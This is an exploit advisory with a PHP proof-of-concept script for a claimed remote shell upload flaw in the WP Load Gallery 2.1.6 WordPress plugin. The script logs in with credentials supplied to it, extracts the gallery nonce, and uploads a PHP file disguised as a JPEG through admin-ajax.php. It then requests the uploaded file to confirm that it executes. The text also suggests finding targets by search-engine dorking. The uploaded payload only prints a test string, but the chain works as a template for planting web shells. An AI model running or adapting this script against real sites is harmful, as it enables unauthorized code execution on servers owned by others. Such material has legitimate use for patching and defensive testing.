=============================================================================================================================================
| # Title     : WP Load Gallery plugin v2.1.6 Code Injection Vulnerability                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://wphive.com/plugins/wp-load-gallery/                                                                                 |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] vulnerability found in WP Load Gallery plugin version 2.1.6 & suffers from a remote shell upload vulnerability.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php -u <URL> -un <USERNAME> -p <PASSWORD>

[+] PayLoad :

<?php
// تحسين كود الاختبار الأمني - بيئة محلية فقط
$target_url = $argv[1] ?? '';
$username = $argv[2] ?? '';
$password = $argv[3] ?? '';

if (!$target_url || !$username || !$password) {
    die("Usage: php script.php <url> <username> <password>\n");
}

$target_url = rtrim($target_url, '/');
$login_url = "$target_url/wp-login.php";
$gallery_url = "$target_url/wp-admin/admin.php?page=wp-load-gallery";
$ajax_url = "$target_url/wp-admin/admin-ajax.php";
$shell_filename = "indoushka.php";
$shell_path = "$target_url/wp-content/uploads/2025/02/$shell_filename";
$shell_content = "<?php echo 'Hello, Security Test!'; ?>";
$user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0";

// التحقق من وجود الإضافة
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$target_url/wp-content/plugins/wp-load-gallery/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    die("[!] WP Load Gallery غير مثبت أو غير مفعل.\n");
}

// إنشاء ملف الحمولة
file_put_contents($shell_filename, $shell_content);

// تسجيل الدخول
$login_data = [
    "log" => $username,
    "pwd" => $password,
    "rememberme" => "forever",
    "wp-submit" => "Log In"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (!strpos($response, 'dashboard')) {
    die("[!] فشل تسجيل الدخول.\n");
}

echo "[+] تسجيل الدخول ناجح.\n";

// استخراج wplg_nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $gallery_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (preg_match('/"wplg_nonce"\s*value="(\w+)"/', $response, $matches)) {
    $wplg_nonce = $matches[1];
    echo "[+] تم استخراج wplg_nonce: $wplg_nonce\n";
} else {
    die("[!] فشل استخراج wplg_nonce.\n");
}

// رفع الملف
$upload_data = [
    "wplg_nonce" => $wplg_nonce,
    "action" => "wpgallery",
    "wplg_gallery_id" => "205",
    "task" => "wplg_upload",
    "wplg_gallery_file[]" => new CURLFile($shell_filename, "image/jpeg", $shell_filename)
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $upload_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'status') !== false) {
    echo "[+] تم رفع الملف بنجاح!\n";
    echo "[+] التحقق من وجود الملف على: $shell_path\n";

    // التحقق من نجاح الرفع
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $shell_path);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);

    if (strpos($response, 'Hello, Security Test!') !== false) {
        echo "[+] تم رفع الملف بنجاح وهو يعمل!\n";
    } else {
        echo "[!] الملف غير موجود أو لم يعمل كما هو متوقع.\n";
    }
} else {
    echo "[!] فشل رفع الملف، الرجاء التحقق يدويًا.\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================